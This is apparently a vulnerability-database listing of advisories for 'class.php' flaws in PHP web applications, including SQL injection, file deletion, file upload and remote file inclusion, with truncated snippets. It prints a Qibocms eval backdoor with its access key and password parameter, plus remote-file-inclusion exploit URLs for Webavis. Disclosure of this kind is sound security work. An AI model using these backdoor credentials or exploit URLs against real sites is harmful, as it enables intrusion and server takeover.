CmsEasy_5.5_UTF-8_20140118 celive\include\database.class.php 任意sql语句执行漏洞

No description provided by source...

Qibocms v7 /do/class.php 后门

漏洞相关文件：/do/class.php后门内容解密后内容?phpif$GET'key'=='90sec' @eval$REQUEST'shellcode';?漏洞利用过程后门地址：http://domain/do/class.php?key=90sec密码：shellcode...

PHP云人才系统(20141229)2处SQL注入

简要描述： PHP云人才系统20141229二处隐蔽的SQL注入 详细说明： PHP云人才系统二处SQL注入。 0x01: 问答首页 ======================== URL为： http://www.hr135.com/ask/index.php?order=addtime 其中参数order可以注入。 看看代码/include/libs/SmartyCompiler.class.php：5330 5330 function complieqliststart$tagargs 5331 5332 $paramer = $this-parseattrs$tagargs;...

DayuCMS 1.525 /member/include/tag.class.php SQL注入漏洞

/member/include/member.class.phpfunction exists$field, $value return $this-db-fetchone"SELECT id FROM $this-table WHERE $this-table.$field='$value' LIMIT 0, 1"; 传入的$field和$value未经过过滤直接带入SQL语句中。 /member/include/msg.class.php function send$msgs global $userid,$username,$member;...

Phpyun设计缺陷致任意文件删除可致重装getshell或注入

简要描述： 设计缺陷可致任意文件删除 删除lock可直接进行重装直接达到getshell。 或者删除某文件也可以来注入了。 也可导致破坏sql语句。 P.S.又是1点多了,明天又无法认真上课了。 2014年7月23日 01:30:01 新的一天快乐。 详细说明： 依旧官网下的最新版。 在model/ajax.class.php中 function deluploadaction if!$this-uid && !$this-username && $COOKIE"usertype"!=2 echo 0;die; else $dir=$POSTstr0; $isuser =...

Tainos Webdesign (All Scripts) - SQL Injection Cross-Site Scripting HTML Injection

Tainos Webdesign All Scripts - SQL Injection Cross-Site Scripting HTML Injection ------------------------------------------------------------------------------------------- Tainos Webdesign All Scripts SQL/XSS/HTML Injection Vulnerability...

CVE-2008-7026

CVE-2008-7026 describes an unrestricted file-upload vulnerability in eFront (version 3.5.1 build 2710 and earlier) where an attacker can upload a file with an executable extension as a user avatar via the filesystem3.class.php upload process, and then access it through a direct request to the fil...

Webavis 0.1.1 (class.php root) Remote File Inclusion Vulnerability

No description provided by source. Webavis Remote file inclusion root Download script : http://webavis.myreseau.org/src/webavis-0.1.1.tar.gz Thanks Str0ke :D Exploit : http://victim.com/webavis/class/class.php?root=shell.txt ? Discovered by ThE TiGeR MiroTigeratHotmail.com sebug.net...

Webavis 0.1.1 - class.php?root Remote File Inclusion

Webavis 0.1.1 - class.php?root Remote File Inclusion Webavis Remote file inclusion root Download script : http://webavis.myreseau.org/src/webavis-0.1.1.tar.gz Thanks Str0ke :D Exploit : http://victim.com/webavis/class/class.php?root=shell.txt ? Discovered by ThE TiGeR MiroTigeratHotmail.com...

Webavis 0.1.1 (class.php root) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ================================================================== Webavis 0.1.1 class.php root Remote File Inclusion Vulnerability ================================================================== Webavis Remote file inclusion root...

CVE-2006-3752

The CVE-2006-3752 entry concerns SQL injection in the class.php of the Professional Home Page Tools Guestbook. The vulnerability allows remote attackers to inject SQL via any of the five parameters: hidemail, name, mail, ip, or text, potentially compromising data integrity and confidentiality and...